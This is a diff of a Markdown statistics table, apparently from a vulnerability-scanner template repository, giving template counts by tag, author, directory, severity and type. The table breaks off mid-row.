| | | -| squidex | 1 | | | | | | | | | -| accent | 1 | | | | | | | | | -| elemiz | 1 | | | | | | | | | -| crevado | 1 | | | | | | | | | -| vodafone | 1 | | | | | | | | | -| reblogme | 1 | | | | | | | | | -| paneil | 1 | | | | | | | | | -| cargocollective | 1 | | | | | | | | | -| snipeit | 1 | | | | | | | | | -| faust | 1 | | | | | | | | | -| eporner | 1 | | | | | | | | | -| fosstodonorg-mastodon-instance | 1 | | | | | | | | | -| coverity | 1 | | | | | | | | | -| cvent | 1 | | | | | | | | | -| wp-shoutbox-live-chat | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| liberty | 1 | | | | | | | | | -| h5s | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| binom | 1 | | | | | | | | | -| destructoid | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| surreal | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| brandfolder | 1 | | | | | | | | | -| stopbadbots | 1 | | | | | | | | | -| kodexplorer | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| nport | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| mastodon-countersocial | 1 | | | | | | | | | -| wix | 1 | | | | | | | | | -| privatekey | 1 | | | | | | | | | -| steam | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| codecademy | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| aspect | 1 | | | | | | | | | -| szmerinfo | 1 | | | | | | | | | -| twig | 1 | | | | | | | | | -| shortpixel | 1 | | | | | | | | | -| piwik | 1 | | | | | | | | | -| federatedpress-mastodon-instance | 1 | | | | | | | | | -| patriots-win | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| smartblog | 1 | | | | | | | | | -| opensearch | 1 | | | | | | | | | -| appian | 1 | | | | | | | | | -| mastodon-climatejusticerocks | 1 | | | | | | | | | -| poshmark | 1 | | | | | | | | | -| lokalise | 1 | | | | | | | | | -| ymhome | 1 | | | | | | | | | -| perfsonar | 1 | | | | | | | | | -| registry | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| fatwire | 1 | | | | | | | | | -| media-server | 1 | | | | | | | | | -| pandorafms | 1 | | | | | | | | | -| trino | 1 | | | | | | | | | -| ipfind | 1 | | | | | | | | | -| designspriation | 1 | | | | | | | | | -| vcloud | 1 | | | | | | | | | -| oglaszamy24hpl | 1 | | | | | | | | | -| orcus | 1 | | | | | | | | | -| billquick | 1 | | | | | | | | | -| orbys | 1 | | | | | | | | | -| pulmi | 1 | | | | | | | | | -| sensor | 1 | | | | | | | | | -| promodj | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| osint-image | 1 | | | | | | | | | -| opnsense | 1 | | | | | | | | | -| noescape | 1 | | | | | | | | | -| zblog | 1 | | | | | | | | | -| engadget | 1 | | | | | | | | | -| tianqing | 1 | | | | | | | | | -| caa | 1 | | | | | | | | | -| carbonmade | 1 | | | | | | | | | -| ecshop | 1 | | | | | | | | | -| passwordmanager | 1 | | | | | | | | | -| tinder | 1 | | | | | | | | | -| twitter-archived-tweets | 1 | | | | | | | | | -| zendesk | 1 | | | | | | | | | -| bigo-live | 1 | | | | | | | | | -| petfinder | 1 | | | | | | | | | -| monitoring | 1 | | | | | | | | | -| gsm | 1 | | | | | | | | | -| screenshot | 1 | | | | | | | | | -| tufin | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| serpstack | 1 | | | | | | | | | -| pushgateway | 1 | | | | | | | | | -| spx | 1 | | | | | | | | | -| nvrmini | 1 | | | | | | | | | -| icc-pro | 1 | | | | | | | | | -| all-in-one-video-gallery | 1 | | | | | | | | | -| fontsy | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| gira | 1 | | | | | | | | | -| formcraft3 | 1 | | | | | | | | | -| buzzfeed | 1 | | | | | | | | | -| iq-block-country | 1 | | | | | | | | | -| refsheet | 1 | | | | | | | | | -| behat | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| asanhamayesh | 1 | | | | | | | | | -| blogger | 1 | | | | | | | | | -| getresponse | 1 | | | | | | | | | -| proxykingdom | 1 | | | | | | | | | -| tink | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| pollbot | 1 | | | | | | | | | -| strider | 1 | | | | | | | | | -| ultimate-faqs | 1 | | | | | | | | | -| selfcheck | 1 | | | | | | | | | -| phpbb | 1 | | | | | | | | | -| hashnode | 1 | | | | | | | | | -| qibocms | 1 | | | | | | | | | -| casemanager | 1 | | | | | | | | | -| extralunchmoney | 1 | | | | | | | | | -| ios | 1 | | | | | | | | | -| adafruit | 1 | | | | | | | | | -| speed | 1 | | | | | | | | | -| secmail | 1 | | | | | | | | | -| peing | 1 | | | | | | | | | -| ip2whois | 1 | | | | | | | | | -| creatio | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| simple-urls | 1 | | | | | | | | | -| permissions | 1 | | | | | | | | | -| likeevideo | 1 | | | | | | | | | -| oliver | 1 | | | | | | | | | -| linuxorgru | 1 | | | | | | | | | -| inpost-gallery | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| x-ray | 1 | | | | | | | | | -| houzz | 1 | | | | | | | | | -| piano | 1 | | | | | | | | | -| pfblockerng | 1 | | | | | | | | | -| ffserver | 1 | | | | | | | | | -| enterprise | 1 | | | | | | | | | -| saml | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| webclient | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| faktopedia | 1 | | | | | | | | | -| revealjs | 1 | | | | | | | | | -| gnome-extensions | 1 | | | | | | | | | -| clearfy-cache | 1 | | | | | | | | | -| dahua | 1 | | | | | | | | | -| naver | 1 | | | | | | | | | -| meet-me | 1 | | | | | | | | | -| 21buttons | 1 | | | | | | | | | -| cql | 1 | | | | | | | | | -| wireless | 1 | | | | | | | | | -| darudar | 1 | | | | | | | | | -| shirnecms | 1 | | | | | | | | | -| aerocms | 1 | | | | | | | | | -| mofi | 1 | | | | | | | | | -| scratch | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| alquist | 1 | | | | | | | | | -| tinymce | 1 | | | | | | | | | -| hoobe | 1 | | | | | | | | | -| hestia | 1 | | | | | | | | | -| calendar | 1 | | | | | | | | | -| cvms | 1 | | | | | | | | | -| my-instants | 1 | | | | | | | | | -| goip | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| umami | 1 | | | | | | | | | -| epp | 1 | | | | | | | | | -| filmweb | 1 | | | | | | | | | -| lvm | 1 | | | | | | | | | -| intel | 1 | | | | | | | | | -| mod-db | 1 | | | | | | | | | -| webp | 1 | | | | | | | | | -| covalent | 1 | | | | | | | | | -| googlemaps | 1 | | | | | | | | | -| backpack | 1 | | | | | | | | | -| tekon | 1 | | | | | | | | | -| dateinasia | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| onlinefarm | 1 | | | | | | | | | -| prototype | 1 | | | | | | | | | -| tabletoptournament | 1 | | | | | | | | | -| omni | 1 | | | | | | | | | -| launchdarkly | 1 | | | | | | | | | -| infinitewp | 1 | | | | | | | | | -| updraftplus | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| imgsrcru | 1 | | | | | | | | | -| aryanic | 1 | | | | | | | | | -| media | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| mailmap | 1 | | | | | | | | | -| diablo | 1 | | | | | | | | | -| zendframework | 1 | | | | | | | | | -| jsapi | 1 | | | | | | | | | -| luci | 1 | | | | | | | | | -| codepen | 1 | | | | | | | | | -| mercurial | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| hcl | 1 | | | | | | | | | -| yazawaj | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| acs | 1 | | | | | | | | | -| facturascripts | 1 | | | | | | | | | -| fhem | 1 | | | | | | | | | -| autonomy | 1 | | | | | | | | | -| cryptobox | 1 | | | | | | | | | -| fuji | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| content-central | 1 | | | | | | | | | -| inkbunny | 1 | | | | | | | | | -| vanguard | 1 | | | | | | | | | -| edgeos | 1 | | | | | | | | | -| wowhead | 1 | | | | | | | | | -| duolingo | 1 | | | | | | | | | -| hydra | 1 | | | | | | | | | -| misp | 1 | | | | | | | | | -| locust | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| vercel | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| +| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | +| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | +| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | +| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | +| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | +| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | +| osint | 652 | geeknik | 221 | headless | 9 | | | | | +| tech | 614 | ricardomaia | 220 | cves.json | 1 | | | | | +| edb | 597 | ritikchaddha | 217 | TEMPLATES-STATS.json | 1 | | | | | +| lfi | 557 | 0x_akoko | 179 | contributors.json | 1 | | | | | +| cve2021 | 434 | theamanrawat | 166 | | | | | | | +| rce | 427 | princechaddha | 156 | | | | | | | +| cve2022 | 401 | gy741 | 144 | | | | | | | +| packetstorm | 369 | arafatansari | 119 | | | | | | | +| wpscan | 348 | tess | 109 | | | | | | | +| misconfig | 305 | madrobot | 65 | | | | | | | +| wp | 291 | zzeitlin | 64 | | | | | | | +| unauth | 272 | idealphase | 63 | | | | | | | +| token-spray | 240 | akincibor | 58 | | | | | | | +| cve2020 | 237 | for3stco1d | 55 | | | | | | | +| top-200 | 208 | r3y3r53 | 51 | | | | | | | +| osint-social | 207 | gaurang | 42 | | | | | | | +| authenticated | 204 | righettod | 41 | | | | | | | +| sqli | 203 | philippedelteil | 41 | | | | | | | +| kev | 200 | edoardottt | 40 | | | | | | | +| config | 195 | pdresearch | 39 | | | | | | | +| | 194 | c-sh0 | 35 | | | | | | | +| oast | 169 | adam crosser | 31 | | | | | | | +| token | 157 | iamnoooob | 29 | | | | | | | +| apache | 151 | rootxharsh | 28 | | | | | | | +| cve2018 | 150 | ice3man | 26 | | | | | | | +| iot | 149 | hardik-solanki | 24 | | | | | | | +| cve2019 | 148 | pwnhxl | 24 | | | | | | | +| default-login | 147 | organiccrap | 24 | | | | | | | +| joomla | 136 | techbrunchfr | 23 | | | | | | | +| file | 135 | johnk3r | 23 | | | | | | | +| login | 130 | ffffffff0x | 22 | | | | | | | +| redirect | 115 | j4vaovo | 20 | | | | | | | +| cve2010 | 112 | sullo | 18 | | | | | | | +| top-100 | 100 | cckuailong | 18 | | | | | | | +| files | 100 | parthmalhotra | 16 | | | | | | | +| cve2023 | 99 | sheikhrishad | 15 | | | | | | | +| router | 97 | ctflearner | 15 | | | | | | | +| network | 96 | random-robbie | 15 | | | | | | | +| ssrf | 96 | pr3r00t | 15 | | | | | | | +| cms | 95 | milo2012 | 14 | | | | | | | +| auth-bypass | 79 | r3dg33k | 14 | | | | | | | +| cve2017 | 77 | theabhinavgaur | 13 | | | | | | | +| devops | 77 | tenbird | 13 | | | | | | | +| takeover | 73 | melbadry9 | 13 | | | | | | | +| intrusive | 72 | 0ri2n | 13 | | | | | | | +| install | 70 | sharath | 13 | | | | | | | +| disclosure | 68 | suman_kar | 12 | | | | | | | +| oracle | 65 | lu4nx | 12 | | | | | | | +| seclists | 60 | elsfa7110 | 11 | | | | | | | +| oss | 57 | dogasantos | 11 | | | | | | | +| cve2015 | 54 | wdahlenb | 11 | | | | | | | +| cisco | 53 | cyllective | 11 | | | | | | | +| google | 53 | logicalhunter | 10 | | | | | | | +| cve2016 | 52 | hackergautam | 10 | | | | | | | +| detect | 51 | nadino | 10 | | | | | | | +| adobe | 50 | alph4byt3 | 10 | | | | | | | +| fileupload | 50 | meme-lord | 10 | | | | | | | +| logs | 46 | random_robbie | 10 | | | | | | | +| tenable | 46 | co5mos | 10 | | | | | | | +| osint-gaming | 45 | emadshanab | 9 | | | | | | | +| vmware | 45 | nullfuzz | 9 | | | | | | | +| atlassian | 45 | 0xpugazh | 9 | | | | | | | +| debug | 44 | fabaff | 9 | | | | | | | +| aem | 44 | 0x240x23elu | 9 | | | | | | | +| vulhub | 44 | oppsec | 9 | | | | | | | +| plugin | 43 | veshraj | 8 | | | | | | | +| cve2014 | 42 | aashiq | 8 | | | | | | | +| osint-porn | 42 | olearycrew | 8 | | | | | | | +| osint-hobby | 42 | iamthefrogy | 8 | | | | | | | +| hackerone | 42 | harsh | 8 | | | | | | | +| huntr | 40 | zh | 8 | | | | | | | +| traversal | 37 | _0xf4n9x_ | 8 | | | | | | | +| generic | 37 | that_juan_ | 8 | | | | | | | +| jira | 36 | caspergn | 7 | | | | | | | +| springboot | 36 | techryptic (@tech) | 7 | | | | | | | +| osint-misc | 35 | amit-jd | 7 | | | | | | | +| aws | 35 | harshbothra_ | 7 | | | | | | | +| kubernetes | 35 | randomstr1ng | 7 | | | | | | | +| injection | 34 | kophjager007 | 7 | | | | | | | +| listing | 33 | leovalcante | 7 | | | | | | | +| deserialization | 31 | its0x08 | 7 | | | | | | | +| sap | 29 | divya_mudgal | 7 | | | | | | | +| osint-coding | 29 | dr_set | 7 | | | | | | | +| osint-tech | 28 | adamcrosser | 7 | | | | | | | +| log4j | 28 | me_dheeraj | 7 | | | | | | | +| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | +| cnvd | 28 | forgedhallpass | 6 | | | | | | | +| gitlab | 27 | pentest_swissky | 6 | | | | | | | +| misc | 26 | puzzlepeaches | 6 | | | | | | | +| php | 26 | xelkomy | 6 | | | | | | | +| microsoft | 26 | ja1sh | 6 | | | | | | | +| fuzz | 25 | justaacat | 6 | | | | | | | +| jndi | 25 | imnightmaree | 6 | | | | | | | +| proxy | 25 | clem9669 | 6 | | | | | | | +| firewall | 24 | evan rubinstein | 6 | | | | | | | +| osint-shopping | 24 | gitlab red team | 6 | | | | | | | +| osint-images | 24 | nodauf | 6 | | | | | | | +| api | 24 | pathtaga | 6 | | | | | | | +| cve2012 | 24 | devang-solanki | 6 | | | | | | | +| osint-finance | 24 | praetorian-thendrickson | 6 | | | | | | | +| manageengine | 24 | __fazal | 6 | | | | | | | +| osint-business | 24 | robotshell | 5 | | | | | | | +| zoho | 23 | prajiteshsingh | 5 | | | | | | | +| k8s | 23 | vicrack | 5 | | | | | | | +| amazon | 23 | kh4sh3i | 5 | | | | | | | +| wp-theme | 22 | r12w4n | 5 | | | | | | | +| ibm | 21 | joanbono | 5 | | | | | | | +| cloud | 21 | yanyun | 5 | | | | | | | +| tomcat | 21 | ganofins | 5 | | | | | | | +| c2 | 21 | s0obi | 5 | | | | | | | +| msf | 21 | defr0ggy | 5 | | | | | | | +| weblogic | 21 | panch0r3d | 5 | | | | | | | +| cicd | 20 | mr-xn | 5 | | | | | | | +| fortinet | 20 | podalirius | 5 | | | | | | | +| camera | 19 | h1ei1 | 4 | | | | | | | +| dlink | 19 | tanq16 | 4 | | | | | | | +| github | 19 | r3naissance | 4 | | | | | | | +| ssl | 19 | dadevel | 4 | | | | | | | +| jenkins | 19 | 3th1c_yuk1 | 4 | | | | | | | +| struts | 19 | dolev farhi | 4 | | | | | | | +| dns | 19 | powerexploit | 4 | | | | | | | +| service | 18 | scent2d | 4 | | | | | | | +| lfr | 18 | wisnupramoedya | 4 | | | | | | | +| ftp | 18 | e_schultze_ | 4 | | | | | | | +| admin | 18 | incogbyte | 4 | | | | | | | +| osint-music | 18 | shine | 4 | | | | | | | +| wavlink | 18 | yash anand @yashanand155 | 3 | | | | | | | +| ir | 17 | k0pak4 | 3 | | | | | | | +| cve2011 | 17 | sushantkamble | 3 | | | | | | | +| osint-blog | 16 | alifathi-h1 | 3 | | | | | | | +| nginx | 16 | huowuzhao | 3 | | | | | | | +| cve2009 | 16 | f1tz | 3 | | | | | | | +| printer | 16 | jarijaas | 3 | | | | | | | +| xxe | 16 | kazet | 3 | | | | | | | +| backup | 16 | true13 | 3 | | | | | | | +| status | 15 | binaryfigments | 3 | | | | | | | +| cve2008 | 15 | swissky | 3 | | | | | | | +| android | 15 | ambassify | 3 | | | | | | | +| hp | 15 | vsh00t | 3 | | | | | | | +| citrix | 15 | fyoorer | 3 | | | | | | | +| magento | 15 | lucasljm2001 | 3 | | | | | | | +| osint-art | 14 | unstabl3 | 3 | | | | | | | +| zyxel | 14 | johnjhacking | 3 | | | | | | | +| jboss | 14 | me9187 | 3 | | | | | | | +| cve2013 | 14 | thomas_from_offensity | 3 | | | | | | | +| woocommerce | 14 | badboycxcc | 3 | | | | | | | +| nodejs | 14 | matt galligan | 3 | | | | | | | +| domainmod | 14 | 0w4ys | 3 | | | | | | | +| osint-health | 14 | bhutch | 3 | | | | | | | +| java | 14 | lark-lab | 3 | | | | | | | +| confluence | 14 | z3bd | 3 | | | | | | | +| mail | 14 | dudez | 3 | | | | | | | +| audit | 14 | splint3r7 | 3 | | | | | | | +| laravel | 13 | canberbamber | 3 | | | | | | | +| abstractapi | 13 | ekrause | 3 | | | | | | | +| creds-stuffing | 13 | davidmckennirey | 3 | | | | | | | +| fortigate | 13 | hahwul | 3 | | | | | | | +| cuppa | 13 | mastercho | 3 | | | | | | | +| osint-dating | 13 | shifacyclewala | 3 | | | | | | | +| login-check | 13 | taielab | 3 | | | | | | | +| osint-political | 13 | whoever | 3 | | | | | | | +| azure | 13 | _generic_human_ | 3 | | | | | | | +| dashboard | 12 | cheesymoon | 3 | | | | | | | +| auth | 12 | atomiczsec | 3 | | | | | | | +| microweber | 12 | mavericknerd | 3 | | | | | | | +| kafka | 12 | andydoering | 3 | | | | | | | +| rails | 12 | evergreencartoons | 3 | | | | | | | +| git | 12 | bernardofsr | 3 | | | | | | | +| netsweeper | 12 | vagnerd | 3 | | | | | | | +| drupal | 12 | ph33r | 3 | | | | | | | +| enum | 12 | yuzhe-zhang-0 | 3 | | | | | | | +| grafana | 12 | arcc | 3 | | | | | | | +| vpn | 12 | arm!tage | 3 | | | | | | | +| webserver | 12 | skeltavik | 3 | | | | | | | +| backdoor | 12 | emenalf | 3 | | | | | | | +| ruby | 12 | fxploit | 3 | | | | | | | +| netgear | 12 | dr0pd34d | 3 | | | | | | | +| graphql | 12 | impramodsargar | 3 | | | | | | | +| airflow | 12 | kishore-hariram | 2 | | | | | | | +| ruijie | 12 | nkxxkn | 2 | | | | | | | +| sonicwall | 11 | joeldeleep | 2 | | | | | | | +| online-fire-reporting | 11 | israel comazzetto dos reis | 2 | | | | | | | +| docker | 11 | myztique | 2 | | | | | | | +| npm | 11 | c3l3si4n | 2 | | | | | | | +| coldfusion | 11 | 0xsapra | 2 | | | | | | | +| cnvd2021 | 11 | coldfish | 2 | | | | | | | +| cisa | 11 | 0xnirvana | 2 | | | | | | | +| osint-video | 11 | d4vy | 2 | | | | | | | +| phpmyadmin | 11 | 0xrudra | 2 | | | | | | | +| setup | 11 | amsda | 2 | | | | | | | +| xstream | 11 | convisoappsec | 2 | | | | | | | +| jolokia | 10 | n-thumann | 2 | | | | | | | +| glpi | 10 | kre80r | 2 | | | | | | | +| spring | 10 | thardt-praetorian | 2 | | | | | | | +| django | 10 | m4lwhere | 2 | | | | | | | +| dedecms | 10 | dheerajmadhukar | 2 | | | | | | | +| dell | 10 | brenocss | 2 | | | | | | | +| bypass | 10 | gevakun | 2 | | | | | | | +| headless | 10 | hackerarpan | 2 | | | | | | | +| symfony | 10 | maximus decimus | 2 | | | | | | | +| ssh | 10 | korteke | 2 | | | | | | | +| solarview | 10 | geekby | 2 | | | | | | | +| ssti | 10 | bing0o | 2 | | | | | | | +| digitalocean | 10 | redteambrasil | 2 | | | | | | | +| db | 10 | y4er | 2 | | | | | | | +| zimbra | 10 | 0xsmiley | 2 | | | | | | | +| kube | 9 | k11h-de | 2 | | | | | | | +| opencats | 9 | megamansec | 2 | | | | | | | +| vcenter | 9 | kiblyn11 | 2 | | | | | | | +| windows | 9 | nvn1729 | 2 | | | | | | | +| redis | 9 | clarkvoss | 2 | | | | | | | +| osint-news | 9 | dogancanbakir | 2 | | | | | | | +| scada | 9 | socketz | 2 | | | | | | | +| installer | 9 | paradessia | 2 | | | | | | | +| gitea | 9 | uomogrande | 2 | | | | | | | +| cache | 9 | dbrwsky | 2 | | | | | | | +| firebase | 9 | ehsahil | 2 | | | | | | | +| wso2 | 9 | sinkettu | 2 | | | | | | | +| prometheus | 9 | wa1tf0rme | 2 | | | | | | | +| thinkphp | 9 | 8arthur | 2 | | | | | | | +| sitecore | 9 | heeress | 2 | | | | | | | +| versa | 9 | bsysop | 2 | | | | | | | +| zabbix | 9 | z0ne | 2 | | | | | | | +| iis | 9 | joshlarsen | 2 | | | | | | | +| fastjson | 9 | moritz nentwig | 2 | | | | | | | +| pfsense | 9 | ricardo maia (brainfork) | 2 | | | | | | | +| mirai | 8 | manas_harsh | 2 | | | | | | | +| metadata | 8 | martincodes-de | 2 | | | | | | | +| druid | 8 | dahse89 | 2 | | | | | | | +| unauthenticated | 8 | udit_thakkur | 2 | | | | | | | +| config-audit | 8 | bp0lr | 2 | | | | | | | +| jetbrains | 8 | lum8rjack | 2 | | | | | | | +| spotweb | 8 | randomrobbie | 2 | | | | | | | +| cnvd2020 | 8 | nybble04 | 2 | | | | | | | +| vbulletin | 8 | lotusdll | 2 | | | | | | | +| elasticsearch | 8 | pxmme1337 | 2 | | | | | | | +| emerge | 8 | 0xprial | 2 | | | | | | | +| default-page | 8 | j3ssie | 2 | | | | | | | +| crlf | 8 | ree4pwn | 2 | | | | | | | +| smtp | 8 | rafaelwdornelas | 2 | | | | | | | +| bucket | 8 | raesene | 2 | | | | | | | +| console | 8 | g4l1t0 | 2 | | | | | | | +| ecology | 8 | joshua rogers | 2 | | | | | | | +| solr | 8 | thezakman | 2 | | | | | | | +| ognl | 8 | github.com/its0x08 | 2 | | | | | | | +| oauth | 8 | notnotnotveg | 2 | | | | | | | +| hms | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| exchange | 8 | koti2 | 2 | | | | | | | +| cisco-switch | 8 | hetroublemakr | 2 | | | | | | | +| recon | 8 | cocxanh | 2 | | | | | | | +| icewarp | 8 | v0idc0de | 2 | | | | | | | +| atom | 8 | danielmofer | 2 | | | | | | | +| ofbiz | 7 | codexlynx | 2 | | | | | | | +| nagios | 7 | 0xcrypto | 2 | | | | | | | +| seeyon | 7 | cckuakilong | 2 | | | | | | | +| error | 7 | afaq | 2 | | | | | | | +| blind | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| shopify | 7 | vavkamil | 2 | | | | | | | +| malware | 7 | 0xelkomy | 2 | | | | | | | +| samsung | 7 | streetofhackerr007 | 2 | | | | | | | +| squirrelmail | 7 | mohammedsaneem | 2 | | | | | | | +| manager | 7 | shelled | 2 | | | | | | | +| nagiosxi | 7 | paperpen | 2 | | | | | | | +| websphere | 7 | parth | 2 | | | | | | | +| gogs | 7 | smaranchand | 2 | | | | | | | +| go | 7 | foulenzer | 2 | | | | | | | +| avtech | 7 | sy3omda | 2 | | | | | | | +| fortios | 7 | bananabr | 2 | | | | | | | +| huawei | 7 | zomsop82 | 2 | | | | | | | +| maps | 7 | luci | 2 | | | | | | | +| ec2 | 7 | nuk3s3c | 2 | | | | | | | +| vms | 7 | supras | 2 | | | | | | | +| sophos | 7 | 666asd | 2 | | | | | | | +| odoo | 7 | w4cky_ | 2 | | | | | | | +| slack | 6 | gal nagli | 2 | | | | | | | +| jamf | 6 | x1m_martijn | 2 | | | | | | | +| moodle | 6 | sbani | 2 | | | | | | | +| minio | 6 | sascha brendel | 2 | | | | | | | +| opensis | 6 | ajaysenr | 2 | | | | | | | +| nexus | 6 | randomdhiraj | 2 | | | | | | | +| solarwinds | 6 | brucelsone | 2 | | | | | | | +| elfinder | 6 | micha3lb3n | 1 | | | | | | | +| fpd | 6 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| artica | 6 | ahmed sherif | 1 | | | | | | | +| plesk | 6 | kaizensecurity | 1 | | | | | | | +| lucee | 6 | w0tx | 1 | | | | | | | +| magmi | 6 | mesaglio | 1 | | | | | | | +| database | 6 | rivalsec | 1 | | | | | | | +| mongodb | 6 | akash.c | 1 | | | | | | | +| pmb | 6 | pdp | 1 | | | | | | | +| rconfig | 6 | sinsinology | 1 | | | | | | | +| s3 | 6 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| keycloak | 6 | secthebit | 1 | | | | | | | +| doctor-appointment-system | 6 | ndmalc | 1 | | | | | | | +| microstrategy | 6 | juliosmelo | 1 | | | | | | | +| symantec | 6 | topscoder | 1 | | | | | | | +| bigip | 6 | ph33rr | 1 | | | | | | | +| activemq | 6 | dale clarke | 1 | | | | | | | +| newrelic | 6 | brabbit10 | 1 | | | | | | | +| leak | 6 | mass0ma | 1 | | | | | | | +| python | 6 | omarjezi | 1 | | | | | | | +| kubelet | 6 | x6263 | 1 | | | | | | | +| jeecg | 6 | affix | 1 | | | | | | | +| jetty | 6 | metascan | 1 | | | | | | | +| openvpn | 6 | alperenkesk | 1 | | | | | | | +| filemanager | 6 | freakyclown | 1 | | | | | | | +| node | 6 | vinit989 | 1 | | | | | | | +| cobbler | 6 | ipanda | 1 | | | | | | | +| liferay | 6 | duty_1g | 1 | | | | | | | +| zhiyuan | 6 | higor melgaço (eremit4) | 1 | | | | | | | +| typo3 | 5 | tea | 1 | | | | | | | +| rseenet | 5 | mukundbhuva | 1 | | | | | | | +| apisix | 5 | xstp | 1 | | | | | | | +| elastic | 5 | gboddin | 1 | | | | | | | +| adminer | 5 | skylark-lab | 1 | | | | | | | +| rfi | 5 | elitebaz | 1 | | | | | | | +| hybris | 5 | imhunterand | 1 | | | | | | | +| cockpit | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| circarlife | 5 | sickwell | 1 | | | | | | | +| awstats | 5 | elouhi | 1 | | | | | | | +| nacos | 5 | shelld3v | 1 | | | | | | | +| gocd | 5 | kr1shna4garwal | 1 | | | | | | | +| storage | 5 | evan rubinstien | 1 | | | | | | | +| firmware | 5 | lingtren | 1 | | | | | | | +| strapi | 5 | mah3sec_ | 1 | | | | | | | +| avaya | 5 | keni0k | 1 | | | | | | | +| hikvision | 5 | berkdusunur | 1 | | | | | | | +| parallels | 5 | mariam tariq | 1 | | | | | | | +| sql | 5 | nytr0gen | 1 | | | | | | | +| ruckus | 5 | blckraven | 1 | | | | | | | +| geoserver | 5 | ramondunker | 1 | | | | | | | +| resin | 5 | hardik-rathod | 1 | | | | | | | +| square | 5 | allenwest24 | 1 | | | | | | | +| heroku | 5 | iampritam | 1 | | | | | | | +| facebook | 5 | noamrathaus | 1 | | | | | | | +| akamai | 5 | arjunchandarana | 1 | | | | | | | +| metinfo | 5 | realexp3rt | 1 | | | | | | | +| server | 5 | lixts | 1 | | | | | | | +| caucho | 5 | liquidsec | 1 | | | | | | | +| microfocus | 5 | elder tao | 1 | | | | | | | +| hashicorp | 5 | y0no | 1 | | | | | | | +| tikiwiki | 5 | jaskaran | 1 | | | | | | | +| fatpipe | 5 | ynnirc | 1 | | | | | | | +| prestashop | 5 | patrick pirker | 1 | | | | | | | +| kkfileview | 5 | ofjaaah | 1 | | | | | | | +| 74cms | 5 | 0xceba | 1 | | | | | | | +| avideo | 5 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| vrealize | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| cacti | 5 | couskito | 1 | | | | | | | +| paypal | 5 | sleepingbag945 | 1 | | | | | | | +| carrental | 5 | thelicato | 1 | | | | | | | +| openemr | 5 | lrtk-coder | 1 | | | | | | | +| alibaba | 5 | sec_hawk | 1 | | | | | | | +| telesquare | 4 | andysvints | 1 | | | | | | | +| webmin | 4 | marcos_iaf | 1 | | | | | | | +| mailchimp | 4 | tirtha_mandal | 1 | | | | | | | +| log | 4 | zy9ard3 | 1 | | | | | | | +| stored | 4 | zhenwarx | 1 | | | | | | | +| httpserver | 4 | tehtbl | 1 | | | | | | | +| roxy | 4 | nagli | 1 | | | | | | | +| centos | 4 | barthy.koeln | 1 | | | | | | | +| stripe | 4 | houdinis | 1 | | | | | | | +| mikrotik | 4 | shivampand3y | 1 | | | | | | | +| oa | 4 | dmartyn | 1 | | | | | | | +| grav | 4 | danigoland | 1 | | | | | | | +| cve2005 | 4 | wabafet | 1 | | | | | | | +| panos | 4 | aringo | 1 | | | | | | | +| cnvd2019 | 4 | ayadi | 1 | | | | | | | +| asp | 4 | co0nan | 1 | | | | | | | +| royalevent | 4 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| churchcrm | 4 | undefl0w | 1 | | | | | | | +| pie-register | 4 | dk999 | 1 | | | | | | | +| cve2007 | 4 | mhdsamx | 1 | | | | | | | +| voip | 4 | zinminphy0 | 1 | | | | | | | +| ems | 4 | ptonewreckin | 1 | | | | | | | +| bmc | 4 | amnotacat | 1 | | | | | | | +| artifactory | 4 | ramkrishna sawant | 1 | | | | | | | +| powerjob | 4 | hexcat | 1 | | | | | | | +| postmessage | 4 | narluin | 1 | 